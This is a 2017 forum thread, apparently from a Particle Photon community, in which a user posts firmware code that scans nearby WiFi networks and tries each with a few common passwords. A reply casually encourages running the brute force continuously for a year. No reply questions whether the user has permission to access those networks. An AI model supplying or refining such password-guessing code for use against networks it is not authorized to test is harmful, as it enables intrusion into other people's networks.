Wifi ambient "hacking"

bufferout · March 16, 2017, 3:59am

How feasible do you think it would be to scan for surrounding WiFi networks, then try connecting via a number of regularly used passwords? i.e. a background wifi scanner constantly looking for weakly secured networks.

I’ve got part of the way but it all seems terrible flaky…

void checkCredentials(char *ssid, char *password, int security) {
       Serial.print("Try ");
        Serial.print(String(ssid));
        Serial.print(" with pass ");
        Serial.print(String(password));
        Serial.println();
        
        WiFi.disconnect();
        WiFi.clearCredentials();
        delay(1000);
        WiFi.off();
        delay(1000);
        WiFi.on();
        delay(1000);
        Serial.println("prepping connection");
        
        if(security == 1) {
            WiFi.setCredentials(String(ssid), String(password), WEP);
        } else if(security == 2) {
            WiFi.setCredentials(String(ssid), String(password), WPA);
        } else {
            WiFi.setCredentials(String(ssid), String(password));
        }
        
        Serial.println("wifi.connect");
        WiFi.connect();
        
        while(WiFi.connecting()) delay(100);
        Serial.println("end wifi.connecting");
        

        if(WiFi.ready()) {
            Serial.println("SUCCESS");
            Serial.println();

        } else {
            Serial.println("FAIL");
            Serial.println();
        }

}

    WiFiAccessPoint aps[5];
    int found = WiFi.scan(aps, 5);
    for (int i=0; i<found; i++) {
        WiFiAccessPoint& ap = aps[i];
        
        
        if(ap.security == 1) {
            securityConversion = 1;
        } else if(ap.security == 2) {
            securityConversion = 2;
        } else {
            securityConversion = 3;
        }
        
        
        checkCredentials(ap.ssid, "opensesame", securityConversion); 
        checkCredentials(ap.ssid, "comeonin", securityConversion); 
        checkCredentials(ap.ssid, "123456789", securityConversion); 
        
        
    }

peekay123 · March 16, 2017, 11:54am

@bufferout, setting credentials so many times may wear out the flash in the WiFi module. Perhaps @mdma or @BDub may have something to say here.

BDub · March 16, 2017, 4:52pm

It’s going to be slow going I think, because you’ll have to wait a while to know if it connects or not. Let’s say you force a timeout after 10 seconds. If you tried a new password every 10 seconds, you could easily brute force passwords for a whole year continuously no problem. If the Photon wears out after a year, well… it cost you very little to have your fun

Topic		Replies	Views
Connecting to wifi from code Firmware	2	658	August 8, 2018
WiFi.setCredentials clarification Firmware	9	3141	January 21, 2016
WiFi.setCredentials problem using String Getting Started	23	3746	February 16, 2015
[Solved] - Troubleshooting Kickstarter era Core's WiFi.getCredentials() [CC3000 can't read back creds.]] Troubleshooting	2	1334	May 26, 2016
[SOLVED] setCredentials not saving WiFi credentials Firmware	2	1332	April 24, 2016

Wifi ambient "hacking"

Related topics